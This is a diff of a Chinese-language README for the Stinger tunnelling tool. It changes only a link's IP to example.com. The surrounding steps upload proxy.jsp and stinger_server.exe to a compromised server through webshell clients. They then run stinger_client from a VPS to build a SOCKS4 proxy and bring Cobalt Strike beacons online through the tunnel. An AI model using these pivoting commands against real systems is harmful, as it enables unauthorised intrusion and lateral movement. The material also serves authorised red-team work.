|
13 | 13 | ## SOCK4代理
|
14 | 14 |
|
15 | 15 |
|
16 |
| -* proxy.jsp上传到目标服务器,确保 [http://example.com:8080/proxy.jsp](http://192.168.3.11:8080/proxy.jsp) 可以访问,页面返回 stinger XXX! |
| 16 | +* proxy.jsp上传到目标服务器,确保 [http://example.com:8080/proxy.jsp](http://example.com:8080/proxy.jsp) 可以访问,页面返回 stinger XXX! |
17 | 17 | * 将stinger_server.exe上传到目标服务器,蚁剑/冰蝎执行```start D:/XXX/stinger_server.exe```启动服务端
|
18 | 18 | > 不要直接运行D:/XXX/stinger_server.exe,会导致tcp断连
|
19 | 19 | * vps执行```./stinger_client -w http://example.com:8080/proxy.jsp -l 0.0.0.0 -p 60000```
|
@@ -49,7 +49,7 @@ root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1
|
49 | 49 |
|
50 | 50 | ## cobalt strike单主机上线
|
51 | 51 |
|
52 |
| -* proxy.jsp上传到目标服务器,确保 [http://example.com:8080/proxy.jsp](http://example.com:8080/proxy.jsp) 可以访问,页面返回 stinger XXX! |
| 52 | +* proxy.jsp上传到目标服务器,确保 [http://example.com:8080/proxy.jsp](http://example.com:8080/proxy.jsp) 可以访问,页面返回 stinger XXX! |
53 | 53 | * 将stinger_server.exe上传到目标服务器,蚁剑/冰蝎执行```start D:/XXX/stinger_server.exe```启动服务端
|
54 | 54 | > 不要直接运行D:/XXX/stinger_server.exe,会导致tcp断连
|
55 | 55 | * stinger_client命令行执行```./stinger_client -w http://example.com:8080/proxy.jsp -l 0.0.0.0 -p 60000```
|
@@ -85,7 +85,7 @@ root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1
|
85 | 85 |
|
86 | 86 | ## cobalt strike多主机上线
|
87 | 87 |
|
88 |
| -* proxy.jsp上传到目标服务器,确保 [http://example.com:8080/proxy.jsp](http://example.com:8080/proxy.jsp) 可以访问,页面返回 stinger XXX! |
| 88 | +* proxy.jsp上传到目标服务器,确保 [http://example.com:8080/proxy.jsp](http://example.com:8080/proxy.jsp) 可以访问,页面返回 stinger XXX! |
89 | 89 | * 将stinger_server.exe上传到目标服务器,蚁剑/冰蝎执行```start D:/XXX/stinger_server.exe 192.168.3.11```启动服务端
|
90 | 90 | > 192.168.3.11可以改成0.0.0.0
|
91 | 91 | * stinger_client命令行执行```./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000```
|
@@ -146,4 +146,3 @@ root@kali:~# ./stinger_client -w http://example.com:8080:8080/proxy.jsp -l 127.0
|
146 | 146 | **2.1**
|
147 | 147 | 更新时间: 2020-01-07
|
148 | 148 | * 支持CS上线功能(即端口映射功能)
|
149 |
| - |
0 commit comments